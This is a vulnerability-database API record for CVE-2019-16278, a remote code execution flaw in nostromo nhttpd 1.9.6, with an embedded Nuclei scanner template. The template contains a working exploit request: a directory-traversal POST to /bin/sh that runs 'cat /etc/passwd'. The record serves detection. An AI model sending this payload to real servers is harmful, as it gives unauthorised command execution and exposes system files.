{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2019-16278/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2019-16278/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2019-16278/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2019-16278/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2019-16278/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2019-16278"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2019-16278"
    }
  },
  "enrichments": {
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2019/CVE-2019-16278.yaml",
      "nuclei_template_severity": "critical",
      "nuclei_template_yaml": "id: CVE-2019-16278\n\ninfo:\n  name: nostromo 1.9.6 - Remote Code Execution\n  author: pikpikcu\n  severity: critical\n  description: nostromo nhttpd through 1.9.6 allows an attacker to achieve remote code execution via  directory traversal in the function http_verify.\n  impact: |\n    Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system.\n  remediation: |\n    Upgrade to a patched version of nostromo web server (1.9.7 or later) or apply the vendor-supplied patch.\n  reference:\n    - https://packetstormsecurity.com/files/155802/nostromo-1.9.6-Remote-Code-Execution.html\n    - https://www.exploit-db.com/raw/47837\n    - https://nvd.nist.gov/vuln/detail/CVE-2019-16278\n    - http://www.nazgul.ch/dev/nostromo_cl.txt\n    - http://packetstormsecurity.com/files/155045/Nostromo-1.9.6-Directory-Traversal-Remote-Command-Execution.html\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2019-16278\n    cwe-id: CWE-22\n    epss-score: 0.99033\n    epss-percentile: 0.9993\n    cpe: cpe:2.3:a:nazgul:nostromo_nhttpd:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: nazgul\n    product: nostromo_nhttpd\n  tags: cve,cve2019,edb,rce,packetstorm,nazgul,kev,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1\n        Host: {{Hostname}}\n\n        echo\n        echo\n        cat /etc/passwd 2>&1\n\n    matchers:\n      - type: regex\n        regex:\n          - \"root:.*:0:0:\"\n# digest: 490a004630440220284ac7adf70875947352e4f9c93b432f5d8e643c7ca747bad9256128ff6b623d0220729244fcc107a1590d1b27cedde9e9c2d2f429deaada5026d386b79e8f8037bb:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2019-16278"
}